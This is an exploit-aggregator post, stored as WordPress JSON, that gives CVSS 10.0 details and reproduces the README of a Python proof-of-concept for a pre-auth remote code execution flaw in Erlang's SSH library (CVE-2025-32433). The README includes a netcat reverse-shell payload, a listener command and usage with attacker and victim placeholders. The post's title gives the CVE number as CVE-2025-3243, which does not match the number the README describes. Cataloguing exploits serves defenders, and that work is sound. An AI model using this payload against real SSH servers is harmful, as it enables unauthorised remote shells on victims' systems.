{"id":1557,"date":"2025-04-24T19:34:59","date_gmt":"2025-04-24T19:34:59","guid":{"rendered":"http:\/\/localhost\/?p=1557"},"modified":"2025-04-24T19:34:59","modified_gmt":"2025-04-24T19:34:59","slug":"exploit-for-cve-2025-3243","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=1557","title":{"rendered":"Exploit for CVE-2025-3243"},"content":{"rendered":"
\n

Vulnerability Details<\/h2>\n
\n

Basic Information<\/h3>\n\n\n\n\n\n\n
Title<\/th>\nExploit for CVE-2025-3243<\/td>\n<\/tr>\n
Type<\/th>\ngithubexploit<\/td>\n<\/tr>\n
Published<\/th>\n2025-04-24T19:31:49<\/td>\n<\/tr>\n
Last Seen<\/th>\n2025-04-25T00:03:35<\/td>\n<\/tr>\n
CVSS Score<\/th>\n10.0 (CRITICAL)<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

CVSS v3 Details<\/h3>\n\n\n\n\n\n\n\n\n\n
Attack Vector<\/th>\nNETWORK<\/td>\n<\/tr>\n
Attack Complexity<\/th>\nLOW<\/td>\n<\/tr>\n
Privileges Required<\/th>\nNONE<\/td>\n<\/tr>\n
User Interaction<\/th>\nNONE<\/td>\n<\/tr>\n
Scope<\/th>\nCHANGED<\/td>\n<\/tr>\n
Confidentiality Impact<\/th>\nHIGH<\/td>\n<\/tr>\n
Integrity Impact<\/th>\nHIGH<\/td>\n<\/tr>\n
Availability Impact<\/th>\nHIGH<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

CVE Information<\/h3>\n\n\n\n\n
CVE IDs<\/th>\nCVE-2025-32433, CVE-2025-3243<\/td>\n<\/tr>\n
CWE<\/th>\n<\/td>\n<\/tr>\n
Bulletin Family<\/th>\nexploit<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

Description<\/h3>\n
\n # CVE-2025-32433 Erlang SSH Library Exploit<\/p>\n

A proof-of-concept exploit for **CVE-2025-32433**, a critical vulnerability in Erlang’s SSH library that allows pre-authenticated code execution via malformed `SSH_MSG_CHANNEL_REQUEST` packets.<\/p>\n

—<\/p>\n

## Features<\/p>\n

– **Original exploit** by Matthew Keeley
\n– **Updated version** by Tyler Ramsbey:
\n – Command\u2011line arguments for **LHOST**, **LPORT**, **RHOST**, and **RPORT**
\n – Built\u2011in help and usage via `argparse`
\n – Erlang\u2011style reverse shell payload using `os:cmd(“nc LHOST LPORT -e \/bin\/sh”).`
\n – Clean function decomposition and status logging for each stage<\/p>\n

—<\/p>\n

## Prerequisites<\/p>\n

– **Python 3**
\n– A working `nc` (Netcat) listener on your attack machine
\n– Network access to the target SSH service (default port `22`)<\/p>\n

—<\/p>\n

## Usage<\/p>\n

1. **Start your listener** on the attack box:<\/p>\n

“`sh
\n nc -lvnp 4444
\n “`<\/p>\n

2. **Run the exploit**:<\/p>\n

“`sh
\n python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
\n “`<\/p>\n

3. **Wait for the shell** to connect back to your listener.<\/p>\n

### Help Menu<\/p>\n

“`sh
\n$ python3 CVE-2025-32433.py -h
\nusage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]<\/p>\n

Send a pre-auth SSH channel request with an Erlang RCE payload
\nto get a reverse shell<\/p>\n

optional arguments:
\n -h, –help show this help message and exit
\n -lh LHOST, –lhost LHOST
\n Local host\/IP to receive the reverse shell
\n -lp LPORT, –lport LPORT
\n Local port to receive the reverse shell
\n -rh RHOST, –rhost RHOST
\n Target SSH server IP (default: 10.10.248.101)
\n -rp RPORT, –rport RPORT
\n Target SSH server port (default: 22)
\n“`<\/p>\n

—<\/p>\n

## Credits<\/p>\n

– **Original script** by Matthew Keeley ([MattKeeley](https:\/\/github.com\/MattKeeley))
\n– **This updated version** by Tyler Ramsbey<\/p>\n

—<\/p>\n

## Disclaimer<\/p>\n

Use this code only on systems you own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.<\/p><\/div>\n<\/p><\/div>\n

\n

Impact Assessment<\/h3>\n\n\n\n
Base Score<\/th>\n10.0<\/td>\n<\/tr>\n
Severity<\/th>\nCRITICAL<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

View full CVE details<\/a><\/p>\n<\/p><\/div>\n<\/div>\n